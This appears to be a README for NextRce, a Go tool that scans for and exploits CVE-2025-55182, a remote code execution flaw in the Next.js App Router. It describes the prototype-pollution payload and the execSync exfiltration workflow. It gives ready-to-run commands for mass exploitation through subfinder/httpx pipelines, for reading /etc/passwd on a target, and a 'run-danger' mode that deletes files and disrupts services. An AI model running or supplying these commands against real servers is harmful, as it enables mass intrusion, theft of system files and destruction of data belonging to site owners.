Share
## https://sploitus.com/exploit?id=F753A008-8819-5887-8D0E-33EC429C985C
# CVE-2025-55182 - Next.js RSC Remote Code Execution Exploit


  
  

  [![Go](https://img.shields.io/badge/Go-1.25+-00ADD8?style=for-the-badge&logo=go)](https://golang.org/)
  [![Vulnerability](https://img.shields.io/badge/Vulnerability-RCE-red?style=for-the-badge)](https://nvd.nist.gov/)
  [![License](https://img.shields.io/badge/License-MIT-green?style=for-the-badge)](LICENSE)


  Next.js App Router Remote Code Execution Vulnerability Scanner
  
  
    High-Performance Go Edition
  


---

## ๐Ÿ“– Description

**CVE-2025-55182** is a critical Remote Code Execution vulnerability in Next.js App Router. This high-performance security tool is designed to detect and exploit this vulnerability. It specifically targets the **React Server Components (RSC)** implementation within the Next.js **App Router** architecture.

By manipulating the serialization process in Server Actions, NextRce injects a crafted payload to achieve **Remote Code Execution (RCE)** on vulnerable instances. It features a smart detection engine that automatically distinguishes between vulnerable App Router architectures and safe legacy Pages Routers, ensuring efficiency during mass scans.

## ๐Ÿš€ Key Features

* **Smart Architecture Detection:** Heuristically analyzes the DOM (looking for \`window.__next_f\`) to identify vulnerable **App Router** targets vs. legacy Pages Router sites.
* **Pipeline & CI/CD Ready:** Fully supports \`stdin\` piping. Seamlessly integrates with reconnaissance tools like \`subfinder\`, \`httpx\`, and \`gau\`.
* **High-Performance Concurrency:** Built with Go goroutines and worker pools for scanning thousands of domains concurrently with minimal resource overhead.
* **Auto-Parsing:** Automatically extracts valid URLs from mixed input formats (e.g., status codes, titles, or raw logs).
* **Live RCE Feedback:** Executes commands and retrieves the output directly from the server's response digest.
* **Structured Logging:** Zap logger with colorful console output and JSON file logging for better debugging.
* **Organized Output:** Separate folders for logs, results, commands, and targets with UTF-8 encoding support.
* **Proxy Support:** Full support for HTTP/HTTPS proxies (e.g., Burp Suite, Caido) for deep analysis.

## ๐Ÿ” Technical Analysis

### The Vulnerability (CVE-2025-55182)
Next.js App Router utilizes a custom serialization format for React Server Components (RSC). The vulnerability exists in the deserialization logic of \`Next-Action\` headers. When a specifically crafted object (polluting the \`__proto__\`) is sent to a server action endpoint (e.g., \`/adfa\`), the internal parser can be coerced into executing arbitrary Node.js code via \`child_process\`.

### Exploit Workflow
1.  **Reconnaissance:** NextRce sends a benign probe to check for \`X-Powered-By: Next.js\` headers and specific path structures (\`/_next/\`).
2.  **Fingerprinting:** It scans the response body for the App Router hydration marker:
    * \`window.__next_f\` -> **Vulnerable (App Router)**
    * \`__NEXT_DATA__\` -> **Safe (Pages Router)**
3.  **Payload Injection:** If the architecture is vulnerable, NextRce constructs a multipart/form-data request with a serialized malicious JSON object targeting the prototype.
4.  **Execution & Exfiltration:** The payload forces the server to run \`execSync(cmd)\`. The \`stdout\` is base64 encoded and returned in the \`digest\` field of the server's error response, which NextRce decodes and displays.

## ๐Ÿ› ๏ธ Installation

### Prerequisites
- Go 1.25 or higher
- Make (optional, for easy building)

\`\`\`bash
# Clone the repository
git clone https://github.com/ynsmroztas/NextRce.git

# Navigate to the directory
cd NextRce

# Build using Makefile (recommended)
make build

# OR build manually
go build -o nextrce nextrce.go

# The binary will be created as 'nextrce'
\`\`\`

### Folder Structure
After building, the tool will automatically create these folders:
- \`targets/\` - Store your target URL files here
- \`commands/\` - Store your command files here
- \`logs/\` - Scan logs (JSON format)
- \`results/\` - Scan results (successful, failed, vulnerable targets)

## ๐Ÿ’ป Usage Examples

### 1. Using Makefile (Recommended)
The easiest way to use NextRce with organized folder structure.

```bash
# Run with SAFE commands only (reconnaissance)
make run-safe

# Run with DANGEROUS commands (โš ๏ธ 60 second countdown warning)
make run-danger

# Run with ALL commands from commands/ directory
make run-full

# View scan results
make show-results

# Open results folder
make open-results

# Clean logs and results
make clean-logs
```

### 2. Pipeline / Bug Bounty Mode
NextRce supports stdin piping for integration with reconnaissance tools.

\`\`\`bash
# Scan subdomains, filter live hosts, and exploit immediately
subfinder -d target.com -silent | httpx -sc -td -title -server -silent | ./nextrce -c "id" -t 50 -v
\`\`\`

### 3. Single Target Scan
Test a specific endpoint with a custom command.

\`\`\`bash
./nextrce -u https://vulnerable.target.com -c "cat /etc/passwd" -v
\`\`\`

### 4. Directory-Based Scanning
Scan multiple target files and command files from directories.

\`\`\`bash
# Scan all .txt files in targets/ with all .txt files in commands/
./nextrce -l targets/ -cl commands/ -t 50 -v
\`\`\`

### 5. Single File Scanning
Scan from specific files.

\`\`\`bash
# Scan targets/urls.txt with commands/commands_safe.txt
./nextrce -l targets/urls.txt -cl commands/commands_safe.txt -t 100 -v
\`\`\`

### 6. Proxy Mode (Debug)
Route traffic through Burp Suite or another proxy for analysis.

\`\`\`bash
./nextrce -u https://target.com -c "whoami" -p http://127.0.0.1:8080 -v
\`\`\`

## โš™๏ธ Command Line Options

| Flag | Description | Default |
| :--- | :--- | :--- |
| \`-u\` | Single target URL to scan | \`None\` |
| \`-l\` | File or directory path containing target URLs (supports .txt files) | \`None\` |
| \`-c\` | Single command to execute | \`id\` |
| \`-cl\` | File or directory path containing commands (supports .txt files) | \`None\` |
| \`-t\` | Number of concurrent workers | \`30\` |
| \`-p\` | HTTP Proxy URL (e.g., http://127.0.0.1:8080) | \`None\` |
| \`-v\` | Enable verbose output (show failed attempts and safe targets) | \`false\` |

## ๐Ÿ“ Output Files

All results are saved in the \`results/\` directory with UTF-8 encoding:

| File | Description |
| :--- | :--- |
| \`successful_targets.txt\` | Targets with successful RCE (includes commands and responses) |
| \`vulnerable_targets.txt\` | All vulnerable targets (App Router detected) |
| \`failed_targets.txt\` | Targets where RCE failed |
| \`rce_details.txt\` | Detailed RCE execution results with timestamps |

Logs are saved in \`logs/nextrce.log\` in JSON format for easy parsing.

## ๐ŸŽฏ Makefile Commands

| Command | Description |
| :--- | :--- |
| \`make build\` | Compile the Go binary |
| \`make run\` | Run with ALL commands from directories |
| \`make run-safe\` | Run with SAFE commands only (reconnaissance) |
| \`make run-danger\` | Run with DANGEROUS commands (โš ๏ธ 60s countdown) |
| \`make run-full\` | Run with ALL commands from commands/ directory |
| \`make show-results\` | Display scan results summary in terminal |
| \`make open-results\` | Open results folder in Finder |
| \`make clean\` | Remove compiled binary |
| \`make clean-logs\` | Remove all logs and results |
| \`make help\` | Show all available commands |

## ๐Ÿ”ฅ What's New in Go Edition

- **โšก High Performance:** Built with Go for maximum speed and efficiency
- **๐Ÿ“Š Structured Logging:** Zap logger with colorful console and JSON file output
- **๐Ÿ“ Organized Structure:** Separate folders for targets, commands, logs, and results
- **๐Ÿ”„ Directory Support:** Load all .txt files from directories automatically
- **๐Ÿ’พ UTF-8 Encoding:** Proper encoding for all output files
- **โš ๏ธ Safety Features:** 60-second countdown for dangerous commands
- **๐Ÿ“ˆ Detailed Reports:** Comprehensive scan statistics and success rates
- **๐ŸŽฏ Multiple Run Modes:** Safe, danger, and full scan options

## โš ๏ธ Disclaimer

This tool is developed for **educational and security research purposes only**. 
The author (**Mitsec**) is not responsible for any illegal use, damage, or unauthorized access caused by this tool. 
Always obtain explicit permission from the system owner before performing any security testing.

**โš ๏ธ WARNING:** The \`make run-danger\` command executes DESTRUCTIVE commands that can:
- Delete files and directories
- Modify system configurations
- Disrupt services
- Cause data loss

Use with extreme caution and only on systems you own or have explicit permission to test.